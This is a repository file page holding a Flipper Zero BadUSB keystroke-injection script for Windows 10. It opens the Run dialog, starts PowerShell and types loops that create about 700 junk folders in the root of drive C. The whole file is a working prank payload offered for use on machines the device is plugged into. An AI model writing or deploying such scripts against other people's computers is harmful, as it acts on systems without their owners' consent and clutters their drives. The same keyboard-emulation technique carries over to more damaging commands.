Files
flipper-zero-bad-usb/windows10/create folders in C.txt
T
2023-07-10 08:41:40 +02:00

18 lines
428 B
Plaintext

REM Author: SeenKid (seenkid on Discord)
REM Description: Creates a lot of folders in C:
REM Version: 1.0
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 900
STRING (1..300) | % {new-item -type directory -path "C:\_331232ADA-$_"}
ENTER
DELAY 5000
STRING (1..200) | % {new-item -type directory -path "C:\fdsA$_AAA$_"}
ENTER
DELAY 4000
STRING (1..200) | % {new-item -type directory -path "C:\_$_"}
ENTER